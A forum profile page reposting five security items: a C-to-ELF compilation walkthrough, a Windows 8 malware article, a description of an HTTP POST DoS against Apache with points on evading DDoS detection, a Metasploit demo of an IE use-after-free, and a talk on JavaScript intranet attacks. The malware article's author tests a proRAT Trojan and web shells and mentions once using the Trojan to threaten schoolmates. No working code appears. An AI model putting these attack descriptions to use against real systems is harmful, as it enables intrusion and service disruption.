Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18772

  • Joined

  • Last visited

  • Days Won

    729

 Content Type 

Everything posted by Nytro

  1. Nytro
    Hello World: C, Assembly, Object File and Executable Dejan Lukan January 07, 2013 Introduction Summary: In this article we’ll take a look at the C program that prints “Hello World!” to the screen, which we’ll assemble and compile. Then we’ll compare the results and try to present what’s happening beneath the curtains. Specifically, we will look at which sections are present in the transformation chain: from C code, to assembly code, to object file, to executable. Hello World Program: The Assembly First we need to write the hello world C program, which can be seen below: #include <stdio.h> int main() { printf("Hello World!"); return 0; } It’s a very simple program that doesn’t actually do anything; we intentionally kept it this simple, so we will be able to focus on the bigger picture and not tons of code. We then need to compile the program to obtain the assembly code – we don’t want to do anything else right now. To do that we can use the -S option passed to the gcc program, which takes the source code of the program and generates the assembly instructions. We also want the masm Intel assembly source code and not some other format. We can achieve that by passing the -masm=Intel to the gcc program. If we’re on the 64-bit operating system, we also want to compile the program as 32-bit, which we can achieve by passing the -m32 argument to the gcc program. The whole gcc command that we’re using can be seen in the output below: # gcc -m32 -masm=intel -S hello.c -o hello.s This command effectively takes the hello.c program and compiles it as 32-bit program into assembly instructions that are saved into the hello.s file. The hello.s file now looks like presented below: .file "hello.c" .intel_syntax noprefix .section .rodata .LC0: .string "Hello World!" .text .globl main .type main, @function main: push ebp mov ebp, esp and esp, -16 sub esp, 16 mov eax, OFFSET FLAT:.LC0 mov DWORD PTR [esp], eax call printf mov eax, 0 leave ret .size main, .-main .ident "GCC: (Gentoo 4.5.4 p1.0, pie-0.4.7) 4.5.4" .section .note.GNU-stack,"",@progbits The .file directive states the original source file name that is normally used by debuggers. The .intel_syntax line specifies that we’re using intel sytax assembly and not AT&T syntax. Afterwards we’re defining the .rodata section, which is used for read-only data variables. In our case the .rodata section contains only the zero terminated string “Hello World!” that can be accessed with the LC0 variable. Then we’re defining the .text section, which is used for the code of the program. First we must define the main function (notice the .type main,@function instruction), which is globally visible (notice the .globl main instruction). From the main: label till the ret instruction is the actual code of the program. That code first initializes the stack by pushing the value of the register EBP to the stack, moving the value of register ESP to EBP. The “and esp,-16? is used for optimization because some operations can be performed faster if the stack pointer address is in a multiple of 16 bytes. That instruction is put in there because by default, gcc uses the optimization flag -O2. Then we’re subtracting 16 bytes from the current ESP stack pointer register for local variables. Next, the address to the LC0 (our “Hello World!” string) is read into the register eax and moved to the top of the stack, which is the first and only parameter to the printf function that is called right after. The printf function prints that string on the screen and returns to the caller, which takes care of the stack and returns. The .size instruction sets the size of the main function. The .-main holds the exact size of the function main, which is written to the object file. The .ident instruction saves the ” GCC: (Gentoo 4.5.4 p1.0, pie-0.4.7) 4.5.4? string to the object file in order to save the information about the compiler which was used to compile the executable. Hello World Program: The Object File We’ve seen the assembly code that was generated by the gcc directly from the corresponding C source code. But without the actual assembler and linker we can’t run the executable. To assemble the executable into the object file, we must use the -c option with the gcc compiler, which only assembles/compiles the source file, but does not actually link it. To obtain the object file from the assembly code we need to run the command below: # gcc -m32 -masm=intel -c hello.s -o hello.o # file hello.o hello.o: ELF 32-bit LSB relocatable, Intel 80386, version 1 (SYSV), not stripped We can see that the hello.o is the object file that is actually an ELF 32-bit executable, which is not linked yet. If we want to run the executable, it will fail as noted below: # chmod +x hello.o # ./hello.o bash: ./hello.o: cannot execute binary file We can read the contents of the object file with the readelf program as follows: # readelf -a hello.o ELF Header: Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: REL (Relocatable file) Machine: Intel 80386 Version: 0x1 Entry point address: 0x0 Start of program headers: 0 (bytes into file) Start of section headers: 224 (bytes into file) Flags: 0x0 Size of this header: 52 (bytes) Size of program headers: 0 (bytes) Number of program headers: 0 Size of section headers: 40 (bytes) Number of section headers: 11 Section header string table index: 8 Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .text PROGBITS 00000000 000034 00001d 00 AX 0 0 4 [ 2] .rel.text REL 00000000 000350 000010 08 9 1 4 [ 3] .data PROGBITS 00000000 000054 000000 00 WA 0 0 4 [ 4] .bss NOBITS 00000000 000054 000000 00 WA 0 0 4 [ 5] .rodata PROGBITS 00000000 000054 00000d 00 A 0 0 1 [ 6] .comment PROGBITS 00000000 000061 00002b 01 MS 0 0 1 [ 7] .note.GNU-stack PROGBITS 00000000 00008c 000000 00 0 0 1 [ 8] .shstrtab STRTAB 00000000 00008c 000051 00 0 0 1 [ 9] .symtab SYMTAB 00000000 000298 0000a0 10 10 8 4 [10] .strtab STRTAB 00000000 000338 000015 00 0 0 1 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings) I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown) O (extra OS processing required) o (OS specific), p (processor specific) There are no section groups in this file. There are no program headers in this file. Relocation section '.rel.text' at offset 0x350 contains 2 entries: Offset Info Type Sym.Value Sym. Name 0000000a 00000501 R_386_32 00000000 .rodata 00000012 00000902 R_386_PC32 00000000 printf There are no unwind sections in this file. Symbol table '.symtab' contains 10 entries: Num: Value Size Type Bind Vis Ndx Name 0: 00000000 0 NOTYPE LOCAL DEFAULT UND 1: 00000000 0 FILE LOCAL DEFAULT ABS hello.c 2: 00000000 0 SECTION LOCAL DEFAULT 1 3: 00000000 0 SECTION LOCAL DEFAULT 3 4: 00000000 0 SECTION LOCAL DEFAULT 4 5: 00000000 0 SECTION LOCAL DEFAULT 5 6: 00000000 0 SECTION LOCAL DEFAULT 7 7: 00000000 0 SECTION LOCAL DEFAULT 6 8: 00000000 29 FUNC GLOBAL DEFAULT 1 main 9: 00000000 0 NOTYPE GLOBAL DEFAULT UND printf No version information found in this file. We can see that the file is an ELF object file that has 11 section headers. The first section header is null. The second section header is .text, which contains the executable instructions of the program. The .rel.text holds the relocation information of the .text section. The relocation entries must be present, as our program instructions call external functions, whose function pointers must be updated upon the program execution. In the output above, we can see that the .rel.text holds two relocation entries: the .rodata and printf. The .data section holds the initialized data, while the .bss section holds uninitialized data that the program uses. The .rodata holds read-only data that can be used by the program; this is where our “Hello World!” string is stored. The .comment section holds version control information and the .note.GNU-stack holds some additional data that I won’t describe here. The .shstrtab holds section names, while the .strtab holds section strings and the .symtab holds the symbol table. We can quickly figure out that in the assembly code there was only the .rodata and .text sections defined, but when we translated the assembly code into the object file, quite some sections were added to the file. Those sections are needed to successfully link the executable and properly execute the program. Hello World Program: The Executable The last step is to actually link the object file to make an executable. To do that, we must execute the command below: # gcc -m32 hello.o -o hello # ./hello Hello World! We’ve linked the object file hello.o into the executable ./hello and executed it. Upon execution of the program, the program outputted the “Hello World!” string as it should. If we take a look at the ELF again, we can see that there is a lot of other information and file sections added to the executable, which can be seen below: $ readelf -a hello ELF Header: Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: EXEC (Executable file) Machine: Intel 80386 Version: 0x1 Entry point address: 0x8048330 Start of program headers: 52 (bytes into file) Start of section headers: 4392 (bytes into file) Flags: 0x0 Size of this header: 52 (bytes) Size of program headers: 32 (bytes) Number of program headers: 10 Size of section headers: 40 (bytes) Number of section headers: 30 Section header string table index: 27 Section Headers: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .interp PROGBITS 08048174 000174 000013 00 A 0 0 1 [ 2] .note.ABI-tag NOTE 08048188 000188 000020 00 A 0 0 4 [ 3] .hash HASH 080481a8 0001a8 000028 04 A 5 0 4 [ 4] .gnu.hash GNU_HASH 080481d0 0001d0 000020 04 A 5 0 4 [ 5] .dynsym DYNSYM 080481f0 0001f0 000050 10 A 6 1 4 [ 6] .dynstr STRTAB 08048240 000240 00004c 00 A 0 0 1 [ 7] .gnu.version VERSYM 0804828c 00028c 00000a 02 A 5 0 2 [ 8] .gnu.version_r VERNEED 08048298 000298 000020 00 A 6 1 4 [ 9] .rel.dyn REL 080482b8 0002b8 000008 08 A 5 0 4 [10] .rel.plt REL 080482c0 0002c0 000018 08 A 5 12 4 [11] .init PROGBITS 080482d8 0002d8 000017 00 AX 0 0 4 [12] .plt PROGBITS 080482f0 0002f0 000040 04 AX 0 0 16 [13] .text PROGBITS 08048330 000330 00019c 00 AX 0 0 16 [14] .fini PROGBITS 080484cc 0004cc 00001c 00 AX 0 0 4 [15] .rodata PROGBITS 080484e8 0004e8 000015 00 A 0 0 4 [16] .eh_frame_hdr PROGBITS 08048500 000500 000014 00 A 0 0 4 [17] .eh_frame PROGBITS 08048514 000514 000040 00 A 0 0 4 [18] .ctors PROGBITS 08049f0c 000f0c 000008 00 WA 0 0 4 [19] .dtors PROGBITS 08049f14 000f14 000008 00 WA 0 0 4 [20] .jcr PROGBITS 08049f1c 000f1c 000004 00 WA 0 0 4 [21] .dynamic DYNAMIC 08049f20 000f20 0000d0 08 WA 6 0 4 [22] .got PROGBITS 08049ff0 000ff0 000004 04 WA 0 0 4 [23] .got.plt PROGBITS 08049ff4 000ff4 000018 04 WA 0 0 4 [24] .data PROGBITS 0804a00c 00100c 000008 00 WA 0 0 4 [25] .bss NOBITS 0804a014 001014 000008 00 WA 0 0 4 [26] .comment PROGBITS 00000000 001014 00002a 01 MS 0 0 1 [27] .shstrtab STRTAB 00000000 00103e 0000e9 00 0 0 1 [28] .symtab SYMTAB 00000000 0015d8 000340 10 29 32 4 [29] .strtab STRTAB 00000000 001918 00014d 00 0 0 1 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings) I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown) O (extra OS processing required) o (OS specific), p (processor specific) There are no section groups in this file. Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000034 0x08048034 0x08048034 0x00140 0x00140 R E 0x4 INTERP 0x000174 0x08048174 0x08048174 0x00013 0x00013 R 0x1 [Requesting program interpreter: /lib/ld-linux.so.2] LOAD 0x000000 0x08048000 0x08048000 0x00554 0x00554 R E 0x1000 LOAD 0x000f0c 0x08049f0c 0x08049f0c 0x00108 0x00110 RW 0x1000 DYNAMIC 0x000f20 0x08049f20 0x08049f20 0x000d0 0x000d0 RW 0x4 NOTE 0x000188 0x08048188 0x08048188 0x00020 0x00020 R 0x4 GNU_EH_FRAME 0x000500 0x08048500 0x08048500 0x00014 0x00014 R 0x4 GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4 GNU_RELRO 0x000f0c 0x08049f0c 0x08049f0c 0x000f4 0x000f4 R 0x1 PAX_FLAGS 0x000000 0x00000000 0x00000000 0x00000 0x00000 0x4 Section to Segment mapping: Segment Sections... 00 01 .interp 02 .interp .note.ABI-tag .hash .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 03 .ctors .dtors .jcr .dynamic .got .got.plt .data .bss 04 .dynamic 05 .note.ABI-tag 06 .eh_frame_hdr 07 08 .ctors .dtors .jcr .dynamic .got 09 Dynamic section at offset 0xf20 contains 21 entries: Tag Type Name/Value 0x00000001 (NEEDED) Shared library: [libc.so.6] 0x0000000c (INIT) 0x80482d8 0x0000000d (FINI) 0x80484cc 0x00000004 (HASH) 0x80481a8 0x6ffffef5 (GNU_HASH) 0x80481d0 0x00000005 (STRTAB) 0x8048240 0x00000006 (SYMTAB) 0x80481f0 0x0000000a (STRSZ) 76 (bytes) 0x0000000b (SYMENT) 16 (bytes) 0x00000015 (DEBUG) 0x0 0x00000003 (PLTGOT) 0x8049ff4 0x00000002 (PLTRELSZ) 24 (bytes) 0x00000014 (PLTREL) REL 0x00000017 (JMPREL) 0x80482c0 0x00000011 (REL) 0x80482b8 0x00000012 (RELSZ) 8 (bytes) 0x00000013 (RELENT) 8 (bytes) 0x6ffffffe (VERNEED) 0x8048298 0x6fffffff (VERNEEDNUM) 1 0x6ffffff0 (VERSYM) 0x804828c 0x00000000 (NULL) 0x0 Relocation section '.rel.dyn' at offset 0x2b8 contains 1 entries: Offset Info Type Sym.Value Sym. Name 08049ff0 00000206 R_386_GLOB_DAT 00000000 __gmon_start__ Relocation section '.rel.plt' at offset 0x2c0 contains 3 entries: Offset Info Type Sym.Value Sym. Name 0804a000 00000107 R_386_JUMP_SLOT 00000000 printf 0804a004 00000207 R_386_JUMP_SLOT 00000000 __gmon_start__ 0804a008 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main There are no unwind sections in this file. Symbol table '.dynsym' contains 5 entries: Num: Value Size Type Bind Vis Ndx Name 0: 00000000 0 NOTYPE LOCAL DEFAULT UND 1: 00000000 0 FUNC GLOBAL DEFAULT UND printf@GLIBC_2.0 (2) 2: 00000000 0 NOTYPE WEAK DEFAULT UND __gmon_start__ 3: 00000000 0 FUNC GLOBAL DEFAULT UND __libc_start_main@GLIBC_2.0 (2) 4: 080484ec 4 OBJECT GLOBAL DEFAULT 15 _IO_stdin_used Symbol table '.symtab' contains 52 entries: Num: Value Size Type Bind Vis Ndx Name 0: 00000000 0 NOTYPE LOCAL DEFAULT UND 1: 08048174 0 SECTION LOCAL DEFAULT 1 2: 08048188 0 SECTION LOCAL DEFAULT 2 3: 080481a8 0 SECTION LOCAL DEFAULT 3 4: 080481d0 0 SECTION LOCAL DEFAULT 4 5: 080481f0 0 SECTION LOCAL DEFAULT 5 6: 08048240 0 SECTION LOCAL DEFAULT 6 7: 0804828c 0 SECTION LOCAL DEFAULT 7 8: 08048298 0 SECTION LOCAL DEFAULT 8 9: 080482b8 0 SECTION LOCAL DEFAULT 9 10: 080482c0 0 SECTION LOCAL DEFAULT 10 11: 080482d8 0 SECTION LOCAL DEFAULT 11 12: 080482f0 0 SECTION LOCAL DEFAULT 12 13: 08048330 0 SECTION LOCAL DEFAULT 13 14: 080484cc 0 SECTION LOCAL DEFAULT 14 15: 080484e8 0 SECTION LOCAL DEFAULT 15 16: 08048500 0 SECTION LOCAL DEFAULT 16 17: 08048514 0 SECTION LOCAL DEFAULT 17 18: 08049f0c 0 SECTION LOCAL DEFAULT 18 19: 08049f14 0 SECTION LOCAL DEFAULT 19 20: 08049f1c 0 SECTION LOCAL DEFAULT 20 21: 08049f20 0 SECTION LOCAL DEFAULT 21 22: 08049ff0 0 SECTION LOCAL DEFAULT 22 23: 08049ff4 0 SECTION LOCAL DEFAULT 23 24: 0804a00c 0 SECTION LOCAL DEFAULT 24 25: 0804a014 0 SECTION LOCAL DEFAULT 25 26: 00000000 0 SECTION LOCAL DEFAULT 26 27: 00000000 0 FILE LOCAL DEFAULT ABS hello.c 28: 08049f0c 0 NOTYPE LOCAL DEFAULT 18 __init_array_end 29: 08049f20 0 OBJECT LOCAL DEFAULT 21 _DYNAMIC 30: 08049f0c 0 NOTYPE LOCAL DEFAULT 18 __init_array_start 31: 08049ff4 0 OBJECT LOCAL DEFAULT 23 _GLOBAL_OFFSET_TABLE_ 32: 08048490 5 FUNC GLOBAL DEFAULT 13 __libc_csu_fini 33: 08048495 0 FUNC GLOBAL HIDDEN 13 __i686.get_pc_thunk.bx 34: 0804a00c 0 NOTYPE WEAK DEFAULT 24 data_start 35: 00000000 0 FUNC GLOBAL DEFAULT UND printf@@GLIBC_2.0 36: 0804a014 0 NOTYPE GLOBAL DEFAULT ABS _edata 37: 080484cc 0 FUNC GLOBAL DEFAULT 14 _fini 38: 08049f18 0 OBJECT GLOBAL HIDDEN 19 __DTOR_END__ 39: 0804a00c 0 NOTYPE GLOBAL DEFAULT 24 __data_start 40: 00000000 0 NOTYPE WEAK DEFAULT UND __gmon_start__ 41: 0804a010 0 OBJECT GLOBAL HIDDEN 24 __dso_handle 42: 080484ec 4 OBJECT GLOBAL DEFAULT 15 _IO_stdin_used 43: 00000000 0 FUNC GLOBAL DEFAULT UND __libc_start_main@@GLIBC_ 44: 08048430 90 FUNC GLOBAL DEFAULT 13 __libc_csu_init 45: 0804a01c 0 NOTYPE GLOBAL DEFAULT ABS _end 46: 08048330 0 FUNC GLOBAL DEFAULT 13 _start 47: 080484e8 4 OBJECT GLOBAL DEFAULT 15 _fp_hw 48: 0804a014 0 NOTYPE GLOBAL DEFAULT ABS __bss_start 49: 08048404 29 FUNC GLOBAL DEFAULT 13 main 50: 00000000 0 NOTYPE WEAK DEFAULT UND _Jv_RegisterClasses 51: 080482d8 0 FUNC GLOBAL DEFAULT 11 _init Histogram for bucket list length (total of 3 buckets): Length Number % of total Coverage 0 0 ( 0.0%) 1 2 ( 66.7%) 50.0% 2 1 ( 33.3%) 100.0% Histogram for `.gnu.hash' bucket list length (total of 2 buckets): Length Number % of total Coverage 0 1 ( 50.0%) 1 1 ( 50.0%) 100.0% Version symbols section '.gnu.version' contains 5 entries: Addr: 000000000804828c Offset: 0x00028c Link: 5 (.dynsym) 000: 0 (*local*) 2 (GLIBC_2.0) 0 (*local*) 2 (GLIBC_2.0) 004: 1 (*global*) Version needs section '.gnu.version_r' contains 1 entries: Addr: 0x0000000008048298 Offset: 0x000298 Link: 6 (.dynstr) 000000: Version: 1 File: libc.so.6 Cnt: 1 0x0010: Name: GLIBC_2.0 Flags: none Version: 2 Notes at offset 0x00000188 with length 0x00000020: Owner Data size Description GNU 0x00000010 NT_GNU_ABI_TAG (ABI version tag) OS: Linux, ABI: 2.6.9 Conclusion We’ve now seen how a simple program written in C is converted into the assembly code, the object file and finally the executable file. While in the C code, the program didn’t have any sections, it had two sections in assembly dialect: the .rodata and .text. When we compiled it into an object file and finally into the executable, the file had more and more sections that are needed for the program to be executed successfully. Sursa: InfoSec Institute Resources – Hello World: C, Assembly, Object File and Executable
  2. Nytro
    Forensic Artifact: Malware Analysis in Windows 8 Joseph Orekoya January 07, 2013 Windows is the most used operating system worldwide. I have met a lot of IT guys in my country and also other computer elites. My discovery was that 90 percent of them use Windows. I felt maybe that was just in my country, then I decided to contact some friends from UK, USA, India, and Pakistan, and they said the same about the wide use of Windows OS in their countries. However, the case was a bit different for that of the guy in the USA and I also noticed that a lot of my friends there use the MAC OS X. This doesn’t change the fact that Windows is still more used worldwide and because of this, hackers and intruders have had a lot more time to study Windows and create a lot of malware for it. The popular Windows OS has been tagged the most vulnerable OS. Now there is a new Windows OS. The question is: Is it vulnerable as well? This article focuses on the new version of Windows. Windows 8 was released on October 26, 2012. It was designed to work perfectly on a touch screen. The interface is so catchy!! As a computer lover, I follow a page on Facebook named “computer freaks.” Recently, this picture was posted, showing that in the timeline of the Microsoft Windows operating system they have always had a good OS, then a bad OS, and then a good one again. Kind of like an arithmetic progression with a common difference of one among the good Windows operating system. Because of this, I decided to do an analysis on this Windows 8 edition of Microsoft Windows to see what will really make it bad or “SHIT,” as the picture puts it. I began to do research on Windows 8 and I discovered that three patches have already been released for Microsoft’s new operating system. This reminds me of when Vista was released, there were so many patches that they just had to make a better version of Windows OS (Windows 7). I’ve used Windows 7 for a long time and I’ve also met some Windows 7 power users that can testify that it is a good one from Microsoft. However, I still think Windows XP stands a higher ranking when we focus on system stability. Speaking more fully of malware, one of Microsoft’s major objectives is to reduce the risk of their OS being infected by malware. As a result, several measures have been taken to reduce the chances of malware infection in Windows 8. Jason Garms of Microsoft has provided some tips on how to keep your PC free from malware in the link below: Protecting you from malware - Building Windows 8 - Site Home - MSDN Blogs Windows 8 has proven to be less vulnerable to malware, because the Windows Defender that comes with it is very active with good heuristics for detecting malwares. Even with all the new security, the common saying still remains true: there is no total security and therefore you cannot be totally secure from malware on Windows 8 but the risk of being affected by malware is just reduced. Windows 8 got better in a lot of ways to the point that their error page had a transformation. This doesn’t have to do with malware, but one thing I still don’t like about the Windows OS is the inability to retain commands on the console (command prompt) after the cmd is closed and reopened. For those who work more on the console, you can imagine using a lot of very long commands and then, simply because you mistakenly closed this console session, when you open another, all those commands are gone and you need to retype them. This is unlike the terminal (console) in Linux. I read and heard from different sources that Windows 8 was secure but I am a big time skeptic, so I had to prove it to myself. To be sure of the fact that Windows 8 is not so vulnerable to malware, I had to start by creating a proRAT Trojan server with my Windows 7 machine and then I sent it to my Windows 8. I have tried this Trojan several times and I’m no novice with it. I used it often in the days when I loved threatening schoolmates in the network, and I still have a good handle on it. As soon as I sent the server file to the Windows 8 OS with an external drive, Windows Defender deleted it. This was really amazing. I don’t have any third-party AV installed and my computer could react that way with malware. I had even seen some Windows 7 OS with third-party AVs that will not detect the server file due to poor heuristics. However, one third-party AV you can rely on to some extent is Norton with its bloodhound heuristics. The image below is what I got when I put my Trojan server on Windows 8: The image below contains the hexadecimal of the Trojan server that was used Windows 8 is indisputably the most secure Microsoft Windows, but we cannot still match its malware detection with MAC OS X. I realized that the Windows 8 defender that protects us from malware is the popular Microsoft Security Essentials. It’s good the way they saved us the cost of buying Microsoft Security Essentials separately. There are interesting testimonies everywhere about Windows 8 and its safe usage and security but this doesn’t make it impeccable. Although I’ve not personally found any faults in Windows 8, from my research I discovered that the new Windows version that was released already had its first security patch on November 13, 2012, which was just a few weeks after it was released. Also, not that I’m very sure about this, but I came across an article that said the Bitdefender company had tested some malware on Windows 8 and one piece of malware had its way with Windows 8. This particular malware is capable of creating backdoors that allow hackers to remotely control the computer of the host and also to steal gaming credentials and a lot more. However, the company used malware collected over the last six months, which is not ideal, because the test sample won’t include every threat and also because every antivirus product misses some software nastiness, giving a greater chance to the attacker. Bitdefender also tested the malware by fetching a copy of the malicious code from an internal FTP server and executing it to see how far the malware progresses–as opposed to visiting a booby-trapped web page that attempts to compromise the PC, which is a more common method of infection. In theory, there should be little difference, but this methodology bypasses Windows Defender’s SmartScreen, which filters out phishing attacks and malware downloads when using Internet Explorer. Well, this is not an issue to make you reconsider using Windows 8, because a lot of antivirus vendors are just trying to find a fault in the Windows Defender (built-in Microsoft Security Essentials) in order to provide a chance for their own AVs. Another test I tried is the backdoor. I installed WAMP server in Windows 8 on my VMware and I tried to upload a backdoor shell onto it from my host operating system. I kept trying this but to no avail. Then I tried to manually drop the shell into the guest Windows 8 OS server directory. It turned out while cleaning up the file that I received a message notifying me that malware was detected and could not be accessed. I know c99, c100, GNY, and r57 shells are very well-known and restricted by a lot of anti-malware programs. Because of this, I tried to use a WSO shell, but it was still functionless. Left to me, I will say that Windows 8 is like a means to put an end to a hacker’s invasion on web servers. Probably, if most webservers on Linux OS are moved to Windows 8, the hackers would have a lesser chance to upload backdoor shells to damage our web contents. Since some of the antivirus companies have predicted future security shortcomings on the secure Windows 8, we also have to be prepared to keep our PCs protected. I will start by providing you with good software for analyzing Windows executable files. With this software, you can check to see if there is anything attached with an executable application you want to run on your computer. It is called PEid, which identifies “portable executables.” Download with the MediaFire link: PEiD-0.95-20081103.zip If it happens an attacker successfully finds way to drop his malware on your PC, you can also remove it manually from your computer, but you must be very careful because there are some malwares with anti-tracing features that can make your OS crash the moment you detect them. So to find them, you will go to your registry and follow the given registry keys to check for these malwares: HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\explorer\Usershell folders HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrenVersion\RunServicesOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\VMM32Files HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\VxD The reason for locating the malware yourself is because of polymorphic malwares. These are malwares that make it impossible for antivirus and firewalls to detect them. Some of the malwares can make themselves run at your system startup by replicating themselves to the following: Config.sys (a system32 folder) Autoexec.bat (rootdrive) System.ini (Windows folder) Before using the registry keys to locate the files, you may consider disconnecting yourself from the network where it’s likely an attacker is using the malware to attack you. After locating any suspicious file in the registry keys, you can double-click the file to find its path, as the image below shows: As a regular Windows user, you should know we can’t delete files that are working in the background, so we need to check for this file in the task manager processes and stop it. That’s not malicious software, but it’s the exact file I examined in the registry. If it were malicious, I would just click the “End Process” button to put an end to its work. Now you can go back to the directory you were given by the registry and delete the file. After this, you will need to restart your PC if you know the malicious software has not caused much damage to your computer. If it has eaten some of your system files up, you may need to upgrade your Windows OS by using an installation CD to go through the installation process again. This way your files remain intact in a folder, “WindowsOld,” in your C: directory. I have given a link to download the PEid. Now I will show you a little way to make use of this software in examining your executable files. When you unpack the rar file I gave in the link, you will see an interface like the one below: Do not mind the Windows Explorer look of my own software, it’s just a skinpack. On your PC, the three blue dots should be minimize, maximize, and close button. To check details about a particular exe file, you can select the file in the first option of the PEid GUI. Now to check the active processes that may include the malware, you can click “Task Viewer,” which gives you a result like the task manager does. When you select any task, it will show every file attached to the process and working with it. PEid is a really good solution for malware detection. Windows 8 Defender uses the colors green, yellow, and red to show its security level. To make your Windows 8 more secure from malwares, I will advise that you should update Windows Defender as often as possible, as you would any third-party antivirus if you really want to stay secure. Sometimes malware will be placed in software that you already have on your PC. For instance, suppose you downloaded a game that was functioning properly before it started malfunctioning. It is advisable to do an md5 checksum on downloaded files so when it gets suspicious, you can do a checksum again to compare with the previous test and then you will be able to say if it has been tampered with. You can download software for checking your md5 on Windows here: NetTools4.5.74 - Download - 4shared - Joseph Orekoya References Windows 8 already getting security patches | PCWorld Protecting you from malware - Building Windows 8 - Site Home - MSDN Blogs AnandTech - Windows 8 Malware Protection Detailed Windows Defender and Windows SmartScreen fight viruses and other malware - Microsoft Windows Windows 8 'harder for malware to exploit', says security analysis • The Register http://propellerheadforensics.files.wordpress.com/2012/05/thomson_windows-8-forensic-guide2.pdf Sursa: InfoSec Institute Resources – Forensic Artifact: Malware Analysis in Windows 8
  3. Nytro
    Owasp Http Post Dos Apache Webserver Attack Description: This Tutorials shows, how you can easily take out an Apache Webserver with one HTTP POST Tool using a std. slow DSL Connection. This is NO Slowloris Attack! Limitations of HTTP GET DDOS attack: - Does not work on IIS web servers or web servers with timeout limits for HTTP headers. - Easily defensible using popular load balancers, such as F5 and Cisco, reverse proxies and certain Apache modules, such as mod_antiloris. - Anti-DDOS systems may use "delayed binding"/"TCP Splicing" to defend against HTTP GET attacks. Why HTTP POST DDOS attack works - This attack can evade Layer 4 detection techniques as there is no malformed TCP, just like Slowloris. - Unlike Slowloris, there is no delay in sending HTTP Header, hence nullifying IIS built-in defense, making IIS vulnerable too. - Size, character sets and time intervals can be randomised to foil any recognition of Layer 7 traffic patterns by DDOS protection systems. - Difficult to differentiate from legit connections which are slow Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Owasp Http Post Dos Apache Webserver Attack
  4. Nytro
    Microsoft Internet Explorer Cbutton Object Use-After-Free Vulnerability - Metasploit Demo Description: Author: ======= Mzer0 : 4 X Security Team | Just another WordPress site https://twitter.com/4xsecurityteam Tested on Windows XP SP3 With IE 8 -------------------------------------------------------- Description: ---------------- This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting ainly China/Taiwan/and US-based computers Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Microsoft Internet Explorer Cbutton Object Use-After-Free Vulnerability - Metasploit Demo
  5. Nytro
    Blended Threats And Javascript: A Plan For Permanent Network Compromise Description: This is a version of the talk I gave at Black Hat USA 2012, updated specifically for the AppSec USA audience. The original BlackHat slides are available at "scribd.com/doc/101185061/Blended-Threats-and-JavaScript", and the source code used in the demonstrations is available at "github.com/superevr/ddwrt-install-tool". During Black Hat 2006, it was shown how common Web browser attacks could be leveraged bypass perimeter firewalls and "Hack Intranet Websites from the Outside." In the years since, the fundamental problems were never addressed and the Intranet remains wide open, probably because the attack techniques described had important limitations. These limitations prevented mass scale and persistent compromise of network connected devices, which include but are not limited to home broadband routers. Now in 2012, with the help of new research and next-generation technologies like HTML5, browser-based Intranet attacks have overcome many of the old limitations and improved to a new degree of scary. This presentation will cover state-of-the-art browser-to-network threats launched with JavaScript, using zero to minimal user interaction and complete every step of the exploit attack cycle. Starting with enumeration and discovery, escalating the attack further upstream and into embedded network devices, and ultimately mass-scale permanent compromise. ***** Speaker: Phil Perviance, Application Security Consultant, AppSec Consulting, Inc. Phil Purviance is an Application Security Consultant for AppSec Consulting where he researches application security vulnerabilities and performs penetration testing. Phil's body of work includes the discovery and proof-of-concept exploitations of critical security vulnerabilities, design flaws, and system weaknesses in hundreds of custom web sites and web application frameworks. Phil also consults with clients and recommends helpful countermeasures that are useful to mitigate serious security vulnerabilities. Phil's recent exploit talks include the security of HTML5, and the revealing of cross-site scripting vulnerabilities in Skype for iOS. When asked, "Why do you look for bugs in popular websites," he answers, "Because it's fun!" Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Blended Threats and JavaScript: A Plan for Permanent Network Compromise - Phil Perviance on Vimeo Sursa: Blended Threats And Javascript: A Plan For Permanent Network Compromise
  6. Nytro
